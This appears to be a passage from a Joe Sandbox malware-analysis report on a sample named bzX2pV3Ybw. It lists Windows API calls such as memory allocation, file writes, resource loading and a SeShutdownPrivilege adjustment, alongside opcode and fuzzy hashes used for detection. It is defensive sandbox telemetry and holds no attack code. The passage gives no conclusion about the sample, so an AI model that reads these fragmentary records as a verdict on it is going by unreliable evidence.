                                                                                                    • Associated: 00000000.00000002.2614398601.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2614430779.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ErrorLast$FilePointer
                                                                                                    • String ID:
                                                                                                    • API String ID: 1156039329-0
                                                                                                    • Opcode ID: 7730a1f6a5d1c383143cef2e1ec1cb69b5af0836910a757b2920ce96cbe13b7f
                                                                                                    • Instruction ID: 74cf86129294d2faf5969c20f66175129728110ffa3c668ef2bae8a95e28f18b
                                                                                                    • Opcode Fuzzy Hash: 7730a1f6a5d1c383143cef2e1ec1cb69b5af0836910a757b2920ce96cbe13b7f
                                                                                                    • Instruction Fuzzy Hash: C4E04FB1600210AFDB10EEB98D81B9676D89F48364F0485B6EA14DF2C6D274DC00C766
                                                                                                    APIs
                                                                                                    • VirtualAlloc.KERNEL32(00000000,?,00002000,00000001,?,?,?,00401739), ref: 0040145F
                                                                                                    • VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,?,00002000,00000001,?,?,?,00401739), ref: 00401486
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2614373891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2614346539.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2614398601.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2614430779.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Virtual$AllocFree
                                                                                                    • String ID:
                                                                                                    • API String ID: 2087232378-0
                                                                                                    • Opcode ID: 2e9c029c9a25ba07e21da294550151284eb3fb058128c9ffe8d20eb9f4f906d3
                                                                                                    • Instruction ID: 29306f1da17679ce7d7d3cecb65679b0075e6f6f2ddca0a826851c871ac90975
                                                                                                    • Opcode Fuzzy Hash: 2e9c029c9a25ba07e21da294550151284eb3fb058128c9ffe8d20eb9f4f906d3
                                                                                                    • Instruction Fuzzy Hash: 57F02772B0032057DB206A6A0CC1B636AC59F85B90F1541BBFA4CFF3F9D2B98C0042A9
                                                                                                    APIs
                                                                                                    • GetSystemDefaultLCID.KERNEL32(00000000,004053B6), ref: 0040529F
                                                                                                      • Part of subcall function 00404CDC: LoadStringA.USER32(00400000,0000FF87,?,00000400), ref: 00404CF9
                                                                                                      • Part of subcall function 0040520C: GetLocaleInfoA.KERNEL32(?,00000044,?,00000100,0040C4BC,00000001,?,004052D7,?,00000000,004053B6), ref: 0040522A
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2614373891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2614346539.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2614398601.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2614430779.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: DefaultInfoLoadLocaleStringSystem
                                                                                                    • String ID:
                                                                                                    • API String ID: 1658689577-0
                                                                                                    • Opcode ID: ef449c44a2a61a26d18614e24c7ade2666283ce56a0d8fcdc2eeed56ad2c4646
                                                                                                    • Instruction ID: b95c725f163960c8622ba1b0af82130980b93a97e76f79286a035b518bc8de08
                                                                                                    • Opcode Fuzzy Hash: ef449c44a2a61a26d18614e24c7ade2666283ce56a0d8fcdc2eeed56ad2c4646
                                                                                                    • Instruction Fuzzy Hash: 90314F75E01509ABCB00DF95C8C19EEB379FF84304F158577E815BB286E739AE068B98
                                                                                                    APIs
                                                                                                    • CreateFileA.KERNEL32(00000000,?,?,00000000,?,00000080,00000000), ref: 004075B8
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2614373891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2614346539.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2614398601.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2614430779.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CreateFile
                                                                                                    • String ID:
                                                                                                    • API String ID: 823142352-0
                                                                                                    • Opcode ID: c8aa5b1e1f382d9b7ab40d46c96f796d669d4b8c7333918930cf1677525ebce7
                                                                                                    • Instruction ID: d860c9bcffbd3325f9178b4d72e9b59b5a3ff3896166b15a891a1a6cde46a7a7
                                                                                                    • Opcode Fuzzy Hash: c8aa5b1e1f382d9b7ab40d46c96f796d669d4b8c7333918930cf1677525ebce7
                                                                                                    • Instruction Fuzzy Hash: 6EE06D713442082EE3409AEC6C51FA277DCD309354F008032B988DB342D5719D108BE8
                                                                                                    APIs
                                                                                                    • CreateFileA.KERNEL32(00000000,?,?,00000000,?,00000080,00000000), ref: 004075B8
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2614373891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2614346539.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2614398601.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2614430779.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CreateFile
                                                                                                    • String ID:
                                                                                                    • API String ID: 823142352-0
                                                                                                    • Opcode ID: 3bd7282c13d8f152a8301508d2aa72b6e2817799d08f3caede8a9fdcd0036c45
                                                                                                    • Instruction ID: d44512077142226ebef1615cfdb59f208ea4aebd3ed4d24446e2b73eb7949d4a
                                                                                                    • Opcode Fuzzy Hash: 3bd7282c13d8f152a8301508d2aa72b6e2817799d08f3caede8a9fdcd0036c45
                                                                                                    • Instruction Fuzzy Hash: A7E06D713442082ED2409AEC6C51F92779C9309354F008022B988DB342D5719D108BE8
                                                                                                    APIs
                                                                                                    • GetFileAttributesA.KERNEL32(00000000,00000000,00406A24,?,?,?,?,00000000,?,00406A39,00406D67,00000000,00406DAC,?,?,?), ref: 00406A07
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2614373891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2614346539.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2614398601.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2614430779.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AttributesFile
                                                                                                    • String ID:
                                                                                                    • API String ID: 3188754299-0
                                                                                                    • Opcode ID: 2f6b808c0a98facf9b4219f47e50352985dbcf5de86cc118cb6830f30f21a29b
                                                                                                    • Instruction ID: ccd219c895c276d3a4f2ed408fb3af00451e62210c6f1137e8185e88dac79a2a
                                                                                                    • Opcode Fuzzy Hash: 2f6b808c0a98facf9b4219f47e50352985dbcf5de86cc118cb6830f30f21a29b
                                                                                                    • Instruction Fuzzy Hash: A0E0ED30300304BBD301FBA6CC42E4ABBECDB8A708BA28476B400B2682D6786E108428
                                                                                                    APIs
                                                                                                    • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 004076DF
                                                                                                      • Part of subcall function 0040748C: GetLastError.KERNEL32(0040738C,0040752A,?,?,022603AC,?,0040A69B,00000001,00000000,00000002,00000000,0040AC92,?,00000000,0040ACC9), ref: 0040748F
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2614373891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2614346539.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2614398601.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2614430779.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ErrorFileLastWrite
                                                                                                    • String ID:
                                                                                                    • API String ID: 442123175-0
                                                                                                    • Opcode ID: 8d2af3ab7a63a8387ab01b8eb17bee2761ee08039256abb6018552f25082062b
                                                                                                    • Instruction ID: d11fc940c1eb4d9ab9bd5ee1403c634941755763b259216c6d34bff68e3e8731
                                                                                                    • Opcode Fuzzy Hash: 8d2af3ab7a63a8387ab01b8eb17bee2761ee08039256abb6018552f25082062b
                                                                                                    • Instruction Fuzzy Hash: 6DE0ED766081106BD710A65AD880EAB67DCDFC5764F00407BF904DB291D574AC049676
                                                                                                    APIs
                                                                                                    • FormatMessageA.KERNEL32(00003200,00000000,4C783AFB,00000000,?,00000400,00000000,?,00409127,00000000,kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000), ref: 004072A3
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2614373891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2614346539.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2614398601.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2614430779.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: FormatMessage
                                                                                                    • String ID:
                                                                                                    • API String ID: 1306739567-0
                                                                                                    • Opcode ID: 7ef42d69529baecca532a801bf1eab389dc79dba057db81877db687b261eaad4
                                                                                                    • Instruction ID: 7b38442d06f496379890204edef453c821f476d6c52b93f329ea0e63e965d40b
                                                                                                    • Opcode Fuzzy Hash: 7ef42d69529baecca532a801bf1eab389dc79dba057db81877db687b261eaad4
                                                                                                    • Instruction Fuzzy Hash: 17E0D8A0B8830136F22414544C87B77220E47C0700F10807E7700ED3C6D6BEA906815F
                                                                                                    APIs
                                                                                                    • SetEndOfFile.KERNEL32(?,02278000,0040AA59,00000000), ref: 004076B3
                                                                                                      • Part of subcall function 0040748C: GetLastError.KERNEL32(0040738C,0040752A,?,?,022603AC,?,0040A69B,00000001,00000000,00000002,00000000,0040AC92,?,00000000,0040ACC9), ref: 0040748F
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2614373891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2614346539.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2614398601.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2614430779.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ErrorFileLast
                                                                                                    • String ID:
                                                                                                    • API String ID: 734332943-0
                                                                                                    • Opcode ID: 3c9e02bda174eefd6a6752df40b73b0cbe28e66d981a9881f8e50d89b6fd2d40
                                                                                                    • Instruction ID: f788b2e916ece263959a2b362e6cc5638f15ca068e5e6b6e193a7bb405067b9b
                                                                                                    • Opcode Fuzzy Hash: 3c9e02bda174eefd6a6752df40b73b0cbe28e66d981a9881f8e50d89b6fd2d40
                                                                                                    • Instruction Fuzzy Hash: BEC04CA1A1410047CB40A6BE89C1A1666D85A4821530485B6B908DB297D679E8004666
                                                                                                    APIs
                                                                                                    • SetErrorMode.KERNEL32(?,00407019), ref: 0040700C
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2614373891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2614346539.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2614398601.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2614430779.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ErrorMode
                                                                                                    • String ID:
                                                                                                    • API String ID: 2340568224-0
                                                                                                    • Opcode ID: 070e151ae7371931e812c23e1680e2574253ea8634671ff6451d3f815f7c1847
                                                                                                    • Instruction ID: c47f2f618e2971e07f5b1abb1c43dc6c143ad8b034d1ddbdae76011a93498253
                                                                                                    • Opcode Fuzzy Hash: 070e151ae7371931e812c23e1680e2574253ea8634671ff6451d3f815f7c1847
                                                                                                    • Instruction Fuzzy Hash: 54B09B76A1C2415DE705DAD5745153863D4D7C47143A14977F104D35C0D53DA4144519
                                                                                                    APIs
                                                                                                    • SetErrorMode.KERNEL32(?,00407019), ref: 0040700C
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2614373891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2614346539.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2614398601.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2614430779.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ErrorMode
                                                                                                    • String ID:
                                                                                                    • API String ID: 2340568224-0
                                                                                                    • Opcode ID: 258b7047379ce46b8540a294da6ad57472ce1849ceeb23a1b4b516eeda09cad2
                                                                                                    • Instruction ID: a55afa0689d716a84ca499c05243e055e04a08b2ab071a0afeb25d409e08decd
                                                                                                    • Opcode Fuzzy Hash: 258b7047379ce46b8540a294da6ad57472ce1849ceeb23a1b4b516eeda09cad2
                                                                                                    • Instruction Fuzzy Hash: FFA022A8C08000B2CE00E2E08080A3C23283A88308BC08BA2320CB20C0C03CE008020B
                                                                                                    APIs
                                                                                                    • CharPrevA.USER32(?,?,0040696C,?,00406649,?,?,00406D87,00000000,00406DAC,?,?,?,?,00000000,00000000), ref: 00406972
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2614373891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2614346539.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2614398601.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2614430779.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CharPrev
                                                                                                    • String ID:
                                                                                                    • API String ID: 122130370-0
                                                                                                    • Opcode ID: 4f55c7aa95ee0cc6def6f8b84b07f7a00b4eea213dcaa2411b48aa5a82a0c27b
                                                                                                    • Instruction ID: 57bb655d476c0b104ac503b4dc16dcc9cc7d9309af7e6782790f501f1b0aeff9
                                                                                                    • Opcode Fuzzy Hash: 4f55c7aa95ee0cc6def6f8b84b07f7a00b4eea213dcaa2411b48aa5a82a0c27b
                                                                                                    • Instruction Fuzzy Hash:
                                                                                                    APIs
                                                                                                    • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 00407FA0
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2614373891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2614346539.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2614398601.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2614430779.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AllocVirtual
                                                                                                    • String ID:
                                                                                                    • API String ID: 4275171209-0
                                                                                                    • Opcode ID: 636722d4ca057b68616df378e1b8a5bd7f337355b9f7c137ab23b8dc1cafdb71
                                                                                                    • Instruction ID: 1e7236936b067224bcb0a7c190bcfb18a105a15b1652d3161176e1d0ad605fa4
                                                                                                    • Opcode Fuzzy Hash: 636722d4ca057b68616df378e1b8a5bd7f337355b9f7c137ab23b8dc1cafdb71
                                                                                                    • Instruction Fuzzy Hash: 43116371A042059BDB00EF19C881B5B7794AF44359F05807AF958AB2C6DB38E800CBAA
                                                                                                    APIs
                                                                                                    • VirtualFree.KERNEL32(?,?,00004000,?,0000000C,?,-00000008,00003FFB,004018BF), ref: 004016B2
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2614373891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2614346539.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2614398601.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2614430779.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: FreeVirtual
                                                                                                    • String ID:
                                                                                                    • API String ID: 1263568516-0
                                                                                                    • Opcode ID: b4adf7af80dac51c1d798f2a6c61165d01e4b71ea77261fd7569ef2c91f553a4
                                                                                                    • Instruction ID: 63c8255cdd02620dd55efc6405714c3c0a63becca9b218cdeda95617091702f1
                                                                                                    • Opcode Fuzzy Hash: b4adf7af80dac51c1d798f2a6c61165d01e4b71ea77261fd7569ef2c91f553a4
                                                                                                    • Instruction Fuzzy Hash: 3601A7726442148BC310AF28DDC093A77D5EB85364F1A4A7ED985B73A1D23B6C0587A8
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2614373891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2614346539.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2614398601.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2614430779.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CloseHandle
                                                                                                    • String ID:
                                                                                                    • API String ID: 2962429428-0
                                                                                                    • Opcode ID: fc6098dcd6b1504a072b68d3feaaa537492281b052079d944a979dec092e75e7
                                                                                                    • Instruction ID: e7ddd8f09f86228f97b62737e097d00c20d119481f2284b048c56b7aa048eabb
                                                                                                    • Opcode Fuzzy Hash: fc6098dcd6b1504a072b68d3feaaa537492281b052079d944a979dec092e75e7
                                                                                                    • Instruction Fuzzy Hash: 41D05E82B00A6017D615F2BE4D8869692D85F89685B08843AF654E77D1D67CEC00838D
                                                                                                    APIs
                                                                                                    • VirtualFree.KERNEL32(?,00000000,00008000,?,00407E9D), ref: 00407ECF
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2614373891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2614346539.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2614398601.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2614430779.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: FreeVirtual
                                                                                                    • String ID:
                                                                                                    • API String ID: 1263568516-0
                                                                                                    • Opcode ID: c7bedad96efb848ea9f674ed311898bb29a23f2a16fc3a9de009753beeeb9dd9
                                                                                                    • Instruction ID: 622015b425f940adf6dc1d0f89e873b9c6d17cfe6f0c2733970da1323f12c917
                                                                                                    • Opcode Fuzzy Hash: c7bedad96efb848ea9f674ed311898bb29a23f2a16fc3a9de009753beeeb9dd9
                                                                                                    • Instruction Fuzzy Hash: 3ED0E9B17553055BDB90EEB98CC1B0237D8BB48610F5044B66904EB296E674E8009654
                                                                                                    APIs
                                                                                                    • GetCurrentProcess.KERNEL32(00000028), ref: 00409457
                                                                                                    • OpenProcessToken.ADVAPI32(00000000,00000028), ref: 0040945D
                                                                                                    • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,00000028), ref: 00409476
                                                                                                    • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000002,00000000,00000000,00000000,00000000,SeShutdownPrivilege), ref: 0040949D
                                                                                                    • GetLastError.KERNEL32(?,00000000,00000002,00000000,00000000,00000000,00000000,SeShutdownPrivilege), ref: 004094A2
                                                                                                    • ExitWindowsEx.USER32(00000002,00000000), ref: 004094B3
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2614373891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2614346539.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2614398601.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2614430779.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ProcessToken$AdjustCurrentErrorExitLastLookupOpenPrivilegePrivilegesValueWindows
                                                                                                    • String ID: SeShutdownPrivilege
                                                                                                    • API String ID: 107509674-3733053543
                                                                                                    • Opcode ID: 5d5c4cc2167cea31fe6e778ad900630fb502c4628614430f67a63468396a48bc
                                                                                                    • Instruction ID: 55e16e97e4c30333ef6e9d7cb44a764448f3c494fd9ead6bbbdf5d5bb2f9c1eb
                                                                                                    • Opcode Fuzzy Hash: 5d5c4cc2167cea31fe6e778ad900630fb502c4628614430f67a63468396a48bc
                                                                                                    • Instruction Fuzzy Hash: 61F012B069830179E610AAB18D07F6762885BC4B18F50493ABB15FA1C3D7BDD809466F
                                                                                                    APIs
                                                                                                    • FindResourceA.KERNEL32(00000000,00002B67,0000000A), ref: 00409C3E
                                                                                                    • SizeofResource.KERNEL32(00000000,00000000,?,0040A6B3,00000000,0040AC4A,?,00000001,00000000,00000002,00000000,0040AC92,?,00000000,0040ACC9), ref: 00409C51
                                                                                                    • LoadResource.KERNEL32(00000000,00000000,00000000,00000000,?,0040A6B3,00000000,0040AC4A,?,00000001,00000000,00000002,00000000,0040AC92,?,00000000), ref: 00409C63
                                                                                                    • LockResource.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,0040A6B3,00000000,0040AC4A,?,00000001,00000000,00000002,00000000,0040AC92), ref: 00409C74
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2614373891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2614346539.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2614398601.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2614430779.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Resource$FindLoadLockSizeof
                                                                                                    • String ID:
                                                                                                    • API String ID: 3473537107-0
                                                                                                    • Opcode ID: 66472a43d98f2116202d14454299061058d21427157a3f4f4112e001326967e1
                                                                                                    • Instruction ID: 5c2a5118689e511edc0a9dde7e1b9e77d0383d271af581b44440e1e73e890ea9
                                                                                                    • Opcode Fuzzy Hash: 66472a43d98f2116202d14454299061058d21427157a3f4f4112e001326967e1
                                                                                                    • Instruction Fuzzy Hash: B0E07E80B8874726FA6576FB08C7B6B008C4BA570EF00003BB700792C3DDBC8C04462E
                                                                                                    APIs
                                                                                                    • GetLocaleInfoA.KERNEL32(00000000,0000000F,?,00000002,0000002C,?,?,00000000,0040545A,?,?,?,00000000,0040560C), ref: 0040526B
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2614373891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2614346539.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2614398601.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2614430779.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: InfoLocale
                                                                                                    • String ID:
                                                                                                    • API String ID: 2299586839-0
                                                                                                    • Opcode ID: b79b605a6dbd2dbd76dc5df923bc970e8acc9169766131cf64cabc826e101d13
                                                                                                    • Instruction ID: 1db3d1c1bb6fab5f91442dea8a08a829cd161d84d3a7e1f0c2fe21aaaafd944f
                                                                                                    • Opcode Fuzzy Hash: b79b605a6dbd2dbd76dc5df923bc970e8acc9169766131cf64cabc826e101d13
                                                                                                    • Instruction Fuzzy Hash: 9ED02EA230E2006AE210808B2C84EBB4A9CCEC53A0F00007FF648C3242D2208C029B76
                                                                                                    APIs
                                                                                                    • GetSystemTime.KERNEL32(?), ref: 004026CE
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2614373891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2614346539.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2614398601.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2614430779.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: SystemTime
                                                                                                    • String ID:
                                                                                                    • API String ID: 2656138-0
                                                                                                    • Opcode ID: 1c1586f040ad907c453502297459692aa8199981632c93951a31d41848eff65d
                                                                                                    • Instruction ID: 69442b1fa125f02c17f5f00667ba5619268a94e84ed87230136e9e38920861ba
                                                                                                    • Opcode Fuzzy Hash: 1c1586f040ad907c453502297459692aa8199981632c93951a31d41848eff65d
                                                                                                    • Instruction Fuzzy Hash: 14E04F21E0010A82C704ABA5CD435EDF7AEAB95600B044272A418E92E0F631C251C748
                                                                                                    APIs
